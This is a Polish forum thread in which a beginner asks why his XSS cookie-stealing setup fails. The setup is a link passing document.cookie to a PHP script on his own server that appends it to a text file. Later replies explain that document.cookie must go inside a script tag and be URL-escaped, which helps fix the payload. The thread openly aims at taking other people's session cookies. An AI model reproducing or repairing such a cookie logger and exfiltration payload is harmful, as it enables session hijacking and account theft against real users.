Pokaż wyniki 1 do 9 z 9

Temat: XSS i cookie

  1. #1
    Zarejestrowany
    Mar 2008
    Postów
    7

    Domyślnie XSS i cookie

    Zaczynam sie bawic w XSS czy moze mi ktos powiedziec dlaczego cookie nie zapisuja sie do pliku txt :

    Kod html:
    <a href="http://moja_trona.pl/test/zapis.php?cookie=%2Bdocument.cookie;">link</a>
    zapis.php
    Kod php:
    <?php
    $cookie 
    $_GET["cookie"];
    $file fopen("cookie2.txt""a");
    fwrite($file"$cookie\n");
    fclose($file);
    ?>
    zapisuje sie tylko string +document.cookie;

    podejrzewam że skladnia linku w html-u jest zla tylko gdzie ... ?

    Pozdr...

  2. #2
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Poczytaj jak dziala Javascript... HTML nie zna czegos takiego jako document.cookie
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  3. #3
    Avatar GSG-9
    GSG-9 jest offline Shapeshifter
    Zarejestrowany
    Jul 2007
    Skąd
    C:\Perl\bin
    Postów
    1,578

    Domyślnie

    Cytat Napisał R3mal Zobacz post
    podejrzewam że skladnia linku w html-u jest zla tylko gdzie ... ?
    w gecie...
    War, war never changes.

  4. #4
    Zarejestrowany
    Mar 2008
    Postów
    7

    Domyślnie

    no to za bardzo nie pomogliscie mi ...

  5. #5
    Avatar Teddy
    Teddy jest offline Banned
    Zarejestrowany
    Feb 2009
    Skąd
    W 413 linii kodu ;]
    Postów
    85

    Domyślnie

    HTML nie zna tej komendy, to znaczy, że nie zadziała Ci to w html'u, więc poczytaj o javascripcie, a w php masz źle $_get.
    Wytłumaczyłem Ci tylko odpowiedzi innych, ale nie znam się ani na javie ani na php sorki ;/
    Being bastard is fu***ing crazy!
    MÓW POPRAWNĄ POLSZCZYZNĄ
    Perl / PHP / Html

  6. #6
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    na javascript a nie javie... java to nie javascript!
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  7. #7
    Zarejestrowany
    Aug 2009
    Postów
    408

    Domyślnie

    nie kozystaj z plikow w php, to tragedia i lamerstwo. lepiej baza danych lub cos innego niz php jak chcesz pracowac na plikach.

  8. #8
    Zarejestrowany
    Mar 2008
    Postów
    7

    Domyślnie

    Nie ma sensu na wyciagniecie ciasteczek zakladac bazy danych

  9. #9
    Zarejestrowany
    Aug 2009
    Postów
    408

    Domyślnie

    ano niema, ale operacje na plikach sa poprostu niedo*ebane. Jest niby funkcja flock(), ale nie dziala w wiekszasci przypadkow jak powinna. Co za tym idzie? race condition. wiem ze jesli chcesz tylko czyjes ciacho to nie warto sie tym przejmowac, aje jak tylko upublicznisz swoj kod ludzie cie poajda, w tym i ja.

    aha, i document.cokie musisz umiescic w tagu script zeby przegladarka przetlumaczyla. i zakoduj to escape() czy tam w inny sposob, bo znaki &% i http nie ida w parze.

Podobne wątki

  1. Haslo z pliku cookie
    By jayetiii in forum Hacking
    Odpowiedzi: 19
    Autor: 01-05-2009, 22:37
  2. wyciąganie cookie
    By ruben in forum Hacking
    Odpowiedzi: 6
    Autor: 11-02-2008, 14:31
  3. Cookie
    By Ren-Ar in forum Newbie - dla początkujących!
    Odpowiedzi: 10
    Autor: 06-15-2008, 06:59
  4. Zawartosc cookie
    By messiah in forum Inne języki
    Odpowiedzi: 7
    Autor: 04-30-2008, 21:25
  5. Wlasne cookie - realne?
    By ~SD in forum HTML/DHTML/XHTML
    Odpowiedzi: 4
    Autor: 10-17-2007, 19:26

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52